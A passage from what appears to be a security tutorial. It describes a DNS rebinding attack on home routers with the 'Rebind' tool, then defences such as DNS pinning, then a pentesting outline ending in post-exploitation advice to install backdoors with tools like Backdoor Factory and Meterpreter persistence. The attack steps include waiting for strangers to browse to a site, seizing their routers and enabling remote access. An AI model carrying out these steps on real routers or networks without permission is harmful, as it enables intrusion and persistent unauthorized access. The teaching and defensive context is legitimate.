Now what you have to do is open your web browser and set the PROXY SETTINGS to your web server to whatever rebind tells you..

Proxy Settings:
Type: HTTP Proxy
IP: (example.com server)
Port: 664

Now go into your browser and type:


You will be redirected to the Rebind web interface. Once you’ve done that, just wait for someone to browse to example.com and hope their router is vulnerable. Click the box that pops up and you’re in! I recommend that once you get into the router, you enable some form of remote access.

Blocking the attack

Router Config:
This attack has been mainly stopped or prevented by more secure router configurations. What allows this to work is the fact that services (like the HTTP server on your router) are bound to all interfaces and therefore are accessible by all IP’s that it has. It will drop anything coming in the external port, but that doesn’t matter because it is accessing the external IP from the internal LAN.
DNS Pinning:
DNS Pinning basically takes the first DNS response of a site and keeps it. It doesn’t allow for updates… This is depreciated because DNS load balancing is vitally important to major sites, and it interferes with that. However, some sort of verification may be implemented to ensure that each site within a multi-answer DNS response is apart of that domain.

Simple Security Measures:
Change your password
Prioritize HTTPS. Using certificates will allow you to find out whether a secure connection is actually in existence.

Pentesting Methodologies

Information Gathering

This stage occurs before you gain access to a network. The goal is to gather as much information as possible about the business/company and their websites, personnel, and anything else relating to the company which will help you along the way. People often use insecure passwords such as names of their children, year of birth and their company name with a 5 instead of an S etc. Discovering this information about as many users as possible can be incredibly beneficial.


Social Media profiles such as Facebook, Twitter and also things like LinkedIn, Google+ etc.
Social Engineering
Shodan + API


Network Discovery

You should scan the network and map out every possible device, system, domain controller, host, and equipment. This is also where you should start Wireshark or TCPDump to capture data and get a better visual to see what’s going on within the network. In switched networks, you can only passively detect broadcasts from other machines, and not communication between two other machines specifically. However, if you are there as a security engineer, you may want to create a SPAN port on the switch so you can mirror the communication between other ports.



Here is where you should perform port mapping, service version checks, OS detection, service scans, domain enumeration, user enumeration locally, and anything else running on the network which could be helpful. The goal is to find out which machines can be logged onto, what they are serving, what versions the services are and what authentication protocols are being used such as ssh and telnet.



NSE (Nmap Scripting Engine)
Cisco Analysis Tools

Vulnerability Assessment

From looking at the services, devices software, and information you discovered in the enumeration part of the assessment, we get a better understanding of the how the network functions. You can easily scan or search for known vulnerabilities, or attempt to write your own. If you find a service out of date such as apache you can easily find written exploits online.


Metasploit/Armitage + Nexpose
Cisco Analysis Tools

Exploitation and Security

Here you can confirm the systems vulnerable to attacks and exploits that you’ve found during scanning and vulnerability assessment. This is where you should sugest doing security updates, software/hardware updates, and add security configurations for routers, switches, and firewalls.


Metasploit/Armitage + Nexpose
Various Servers (Bind9 DNS servers, DHCP servers, SMB Servers etc.)

Post Exploitation

For this stage you should think about installing a backdoor that you can access if you disconnect from the server.


SBD (secure bd)
Backdoor Factory
Meterpreter Persistence